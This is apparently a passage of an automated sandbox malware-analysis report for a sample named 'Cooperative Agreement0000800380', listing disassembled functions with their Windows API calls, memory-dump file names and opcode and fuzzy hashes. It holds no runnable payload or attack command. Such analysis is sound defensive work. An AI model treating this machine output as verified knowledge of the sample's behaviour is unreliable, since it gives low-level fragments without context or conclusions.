                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00408EED
                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                                                                                                                                                                                                                        • GetWindowTextLengthW.USER32 ref: 00408F0A
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                                                                                                                                                                                                                                        • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00408F3D
                                                                                                                                                                                                                                        • UnregisterClassW.USER32 ref: 00408F53
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2895088630-0
                                                                                                                                                                                                                                        • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                                                                                                                                                                                                                        • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnumWindows.USER32(00409507,?), ref: 0040959B
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00409605
                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2527101397-0
                                                                                                                                                                                                                                        • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                                                                                                                                                                                                                        • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                                                                                                                                                                                                                                        • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocValue$Heap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2472784365-0
                                                                                                                                                                                                                                        • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                                                                                                                                                                                                                        • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • UnregisterWait.KERNEL32(?), ref: 0041200E
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4204870694-0
                                                                                                                                                                                                                                        • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                                                                                                                                                                                                                        • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • wcsncmp.MSVCRT ref: 00405853
                                                                                                                                                                                                                                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                                                                                                                                                                                        • wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: memmovewcsncmpwcsncpy
                                                                                                                                                                                                                                        • String ID: $0A$$0A
                                                                                                                                                                                                                                        • API String ID: 1452150355-167650565
                                                                                                                                                                                                                                        • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                                                                                                                                                                                                                        • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00405562
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressHandleModuleProcmemset
                                                                                                                                                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                                                        • API String ID: 3137504439-1489217083
                                                                                                                                                                                                                                        • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                                                                                                                                                                                                                        • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A0AB
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                                                                                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040A0CC
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040A0FA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeapmemsetwcscpywcslen
                                                                                                                                                                                                                                        • String ID: $0A
                                                                                                                                                                                                                                        • API String ID: 1807340688-513306843
                                                                                                                                                                                                                                        • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                                                                                                                                                                                                                        • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                                                                                                                                                                                                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                                                                                                                                                                                                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                                                                                                                                                                                                                          • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$Free$Alloc
                                                                                                                                                                                                                                        • String ID: $0A
                                                                                                                                                                                                                                        • API String ID: 3901518246-513306843
                                                                                                                                                                                                                                        • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                                                                                                                                                                                                                        • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02399740), ref: 004054AB
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                                                                                          • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3708593966-0
                                                                                                                                                                                                                                        • Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                                                                                                                                                                                                                        • Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                                                                                                                                                                                                                          • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3171405041-0
                                                                                                                                                                                                                                        • Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                                                                                                                                                                                                                        • Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                                          • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02390000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                                                                                                                                                                                        • wcscmp.MSVCRT ref: 004096C2
                                                                                                                                                                                                                                        • memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                        • API String ID: 3734239354-4282027825
                                                                                                                                                                                                                                        • Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                                                                                                                                                                                                                        • Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040B2D7
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040B2E0
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040B2E9
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040B2F6
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040B302
                                                                                                                                                                                                                                          • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
                                                                                                                                                                                                                                          • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                                                                                                        • String ID:
